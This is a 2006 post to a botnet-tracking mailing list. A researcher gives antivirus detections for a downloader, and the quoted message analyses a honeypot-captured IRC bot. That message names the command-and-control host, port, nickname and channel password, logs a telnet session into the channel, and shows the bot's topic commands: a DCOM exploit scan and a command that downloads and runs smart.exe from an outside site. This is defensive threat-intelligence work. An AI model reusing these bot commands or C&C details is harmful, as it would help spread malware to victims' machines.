Re: [botnets] botnetserver: online.ircstyle.net

[Hugo Samayoa]

To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------

Smart.exe is   Sweep found: Troj/Drsmartl-O in file 309e85a41d065e6f96cbc63277b20b82 Norman found: W32/Adload.DO in file 309e85a41d065e6f96cbc63277b20b82 Antivir found: Trojan/Dldr.Adload.W.8 in file 309e85a41d065e6f96cbc63277b20b82         Signed,   Hugo Samayoa Research Engineer eEye Digital Security T: 949.900.4103 E: [EMAIL PROTECTED]     -----Original Message----- From: lordandrej [mailto:[EMAIL PROTECTED] Sent: Tuesday, March 07, 2006 12:17 PM To: botnets@whitestar.linuxbox.org Subject: [botnets] botnetserver: online.ircstyle.net   To report a botnet PRIVATELY please email: [EMAIL PROTECTED] ---------- Hi, today we received lsass.exe (cc95b4224748a4886daa78487a40b8ed) on our  honeypot. According to norman.com it connects to the following botnet:   [ Network services ]      * Looks for an Internet connection.      * Connects to "online.ircstyle.net" on port 6667 (TCP).      * Connects to IRC server.      * IRC: Uses nickname GurL80340024.      * IRC: Uses username ezkieyacag.      * IRC: Joins channel ##rrxx with password li.      * IRC: Sets the usermode for user GurL80340024 to -x+B.     ## joining the party with telnet (BitchX was blocked) telnet online.ircstyle.net 6667 Trying 80.195.235.18... Connected to online.ircstyle.net. Escape character is '^]'. user ezkieyacag hub.57614.com hub.57614.com :Dont nick GurL80340024 :hub.57614.com 001 GurL80340024 :GurL, [EMAIL PROTECTED] :hub.57614.com 005 GurL80340024 MAP KNOCK SAFELIST HCN MAXCHANNELS=8  MAXBANS=60 NICKLEN=30 TOPICLEN=307 KICKLEN=307 MAXTARGETS=15  AWAYLEN=307 :are supported by this server :hub.57614.com 005 GurL80340024 WALLCHOPS WATCH=128 SILENCE=15  MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+  CHANMODES=be,kfL,l,psmntirRcOAQKVGCuzNSMT NETWORK=GurL  CASEMAPPING=ascii EXTBAN=~,cqr :are supported by this server :GurL80340024 MODE GurL80340024 :+iRp join ##rrxx li :[EMAIL PROTECTED] JOIN :##rrxx :hub.57614.com 332 GurL80340024 ##rrxx :;raw join ##lscan,##lmon :hub.57614.com 333 GurL80340024 ##rrxx always 1141759867 :hub.57614.com 353 GurL80340024 @ ##rrxx :GurL80340024 :hub.57614.com 366 GurL80340024 ##rrxx :End of /NAMES list. mode GurL80340024 to -x+B join ##lscan :[EMAIL PROTECTED] JOIN :##lscan :hub.57614.com 332 GurL80340024 ##lscan :;advscan dcom135 150 5 0 -r -s :hub.57614.com 333 GurL80340024 ##lscan always 1141759856 :hub.57614.com 353 GurL80340024 @ ##lscan :GurL80340024 :hub.57614.com 366 GurL80340024 ##lscan :End of /NAMES list. join ##lmon :[EMAIL PROTECTED] JOIN :##lmon :hub.57614.com 332 GurL80340024 ##lmon :;download http:// www.darkblueroom.com/smart.exe c:\smart.exe 1 -s :hub.57614.com 333 GurL80340024 ##lmon always 1141759839 :hub.57614.com 353 GurL80340024 @ ##lmon :GurL80340024 :hub.57614.com 366 GurL80340024 ##lmon :End of /NAMES list.     ## strings of smart.exe: strings smart.exe Project1 Form1 Form1 Form1 VB5! Project1 Project1 Project1 Project1 Form1 Y":O Form c:\program files\microsoft visual studio\vb98\VB6.OLB wininet.dll InternetOpenA InternetOpenUrlA InternetReadFile InternetCloseHandle Download VBA6.DLL ...   No ISP is notified yet   cheers andrej _______________________________________________ botnets mailing list To report a botnet PRIVATELY please email: [EMAIL PROTECTED] http://www.whitestar.linuxbox.org/mailman/listinfo/botnets

_______________________________________________
botnets mailing list
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets